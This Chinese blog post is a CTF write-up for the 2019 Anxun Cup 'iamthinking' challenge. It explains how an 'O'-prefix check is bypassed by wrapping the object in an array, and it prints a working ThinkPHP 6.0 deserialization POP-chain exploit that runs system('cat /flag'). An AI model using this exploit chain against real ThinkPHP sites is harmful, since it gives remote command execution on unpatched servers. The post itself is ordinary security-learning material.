[安洵杯 2019]iamthinking

最新推荐文章于 2024-08-15 16:33:21 发布
最新推荐文章于 2024-08-15 16:33:21 发布
阅读量741 收藏
点赞数
分类专栏: BUUCTF 漏洞整理 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/125326168
版权

知识点:

thinkphp6.0反序列化漏洞

解题:

一进来就发现forbiden,直接目录扫描一波~

发现www.zip,下载下来开始代码审计:

挺简单的就一个index.php控制器,代码大概意思将GET传入的payload参数进行发序列化,但是payload不能以O开头,妥妥的考反序列化漏洞,O是php对象序列化后的第一个字符,既然不能以O开头,那么就把对象放进一个数组里就行了,这样就是以a开头了从而绕过。接下来就是找pop链了,先看看thinkphp6.0有没有已知反序列化漏洞。

 发现6.0刚好存在反序列化漏洞,网上随便搜个exp:

<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));

得到flag:

 

nigo134
关注
专栏目录
web安全渗透测试十大常规项(一):web渗透测试之PHP序列
HACKONE的博客
06-16 750
POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。漏洞危害:如存在__wakeup方法,调用unserilize()方法前则先调用__wakeup方法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup执行。__isset(): //在不可访问的属性上调用isset()或empty()触发。
mips&arm&aarch64-pwn初探
seaaseesa的博客
04-02 4995
mips&arm&aarch64-pwn初探 前言 厌倦了x86/x64 平台下的二进制漏洞利用,来看看mips/arm平台下的pwn是如何达到利用的。众所周知,mips/arm架构cpu主要用于嵌入式设备,比如路由器这些。当我们在x86/x64平台练习到一定境界后,再去探索一个新的平台下的漏洞利用,我们可以借鉴以前的方法,总之,思想都是一样的。只不过是指令的样子不同而已。 ...
第二届安洵2019部分writeup
Sea_Sand息禅
12-01 6154
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
从[安洵2019]iamthinking到thinkphp6.0序列化漏洞复现
m0_64348326的博客
05-30 565
方法,同时满足条件的属性也是在父类Model构造函数中初始化的。但由于Model是抽象类,无法实例化对象,只能找它的子类Pivot来创建对象,但是父类的属性又必须初始化才能满足条件,所以子类的构造函数必须调用父类的构造函数来初始化父类的属性以满足条件。7.继续跟进getAttr()方法,通过getData()然后返回getValue()方法,最后再该方法中找到命令执行点。由于这是个抽象类,于是查找它子类的save()方法看看能不能有利用的。中的save方法,跟进save()方法,然后我们需要进入。
【第62课】PHP序列化&CLI框架类&PHPGGC生成器&TP&Yii&Laravel利用
最新发布
Lucker_YYY的博客
08-15 827
知识点:1、PHP-序列化-开发框架类项目2、PHP-序列化-Payload生成项目3、PHP-序列化-Payload生成综合项目。
ThinkPHP V6.0序列化漏洞复现
WDWAGAAFGAGDADSA的博客
12-11 3903
TP6序列化漏洞复现
安洵学习thinkphp 6.x序列化POP链
一个安全研究员
02-17 1090
依旧膜拜师傅们
安洵 2019】easy-web
bwxzdjn的博客
07-19 949
涉及内容:base64解码、代码审计、MD5强类型注入、命令注入绕过 打开控制器,查看源代码,可以看到md5 is funny,可知这题应该会出现MD5 其余信息一无所获后,看到网站: 看到img=TXpVek5UTTFNbVUzTURabE5qYz0,想到base64解码 于是去Burp Suite解码 (其余大佬解出为555.png,类似一种图片形式) 得知文件名被hex->base64->base64 三重编码 于是加密读取index.php,得到index.php base64形
序列化】广东省第三界强网_API
serendipity1130的博客
08-28 788
考点:序列化、json格式 1.根据提示访问api,发现要进行上传filename 2.当post的filename=index.php会提示:sorry,json_decode error! 3.所以post一个json格式的data:filename={"file":"../index.php"},filename={"file":"../hack.php"}可以读到两个php的源代码: 4.代码审计:x参数调用了一个新的hack类,最后会输出x会执行读取文件的函数,读取文件的函数在hac
PHP序列化及序列化绕过
qq_46041723的博客
11-18 3541
序列化和序列化及绕过前言序列化和序列序列序列序列化绕过ctf题目实例 前言 本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世界。 废话不多说,今天来谈一下PHP的序列化和序列化还有一些绕过姿势 序列化和序列序列化 在PHP里面存在一个serialize方法来实现序列化功能。 Serializable { /* 方法 */ abstract public serialize ( ) : string abstract public unserialize ( string $seria
php 序列化的字母标识
qq_45570082的博客
08-14 1462
ctf比赛中经常出现php序列化的题,所以写一篇博客来记一下php序列化中的字符标识,可能以后会有补充 a:array 数组 php > echo serialize(array()); a:0:{} php > echo serialize(array(1,2)); a:2:{i:0;i:1;i:1;i:2;} i:integer 整数 php > echo serialize(14); i:14; b:boolean bool值 php > echo serialize(
java I/O系统(10):对象序列化(中)
游王子的博客
04-27 134
二、序列化的控制 正如大家所看到的,默认的序列化机制并不难操纵。然而,如果有特殊的需要那又该怎么办呢?例如,也许要考虑特殊的安全问题,而且你不希望对象的某一部分被序列化;或者对象被还原以后,某子对象需要重新创建,从而不必将该子对象序列化。 在这些特殊情况下,可通过实现Externalizable接口——代替实现Serializable接口——来对序列化过程进行控制。这个Exte...
安洵 --writeup
Kr的博客
11-26 3047
web: only d0g3er can see flag 这个打开一个是一个海洋cms,通过百度,在search.php有一个代码执行漏洞 直接构造payload: http://138.68.2.14/seacms/search.php?searchtype=5 POST: searchword=searchword={if{searchpage:year}&amp;year=:e{...
[安洵 2019]easy_web 1
feng的博客
11-12 470
前言 这题是一道没出好的题目,导致了后面的正则匹配出现了很大的问题,不过因为我也菜。。我也对这个正则匹配没有理解好。所以我没看出这个问题。。。 WP 前面的题解就尽量省略一些,主要讲一下最后命令执行的正则匹配。看到url的img传参,base64二次解密再加一次hex解密,就可以得到555.png,因此我们向构造index.php,得到index.php的源码: <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text
mysql 序列化_从一道CTF题目中学习ThinkPHP序列
weixin_39710361的博客
12-23 578
前言去年的安洵,里面有一道iamthinking的题目(好像是这个名字吧),里面考察到了tp6的序列化(通过访问www.zip可以下载源码),按照惯例,我还是没有做出来,我不知道咋绕过那个正则emmmm,给没有做题的大师傅献上关键源码吧,如果有师傅懂,欢迎评论<?php namespace appcontroller; use appBaseController; class Inde...
[CISCN2019 总决赛 Day1 Web4]Laravel1
nigo134的博客
06-17 922
序列化漏洞laravel pop链的挖掘显而易见的考察序列化漏洞,并且告诉了备份source.tar.gz,直接下载下来开始找pop链。序列化的触发点一般为__wakeup()或者__destruct(),更多的是destruct,先找destruct。使用phpstrom,Ctrl+Shift+R查找function __destruct:通过逐个分析找到一个可以文件包含的链, TagAwareAdapter类: 调用过程:__destruct() -> commit() -> invalidat
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值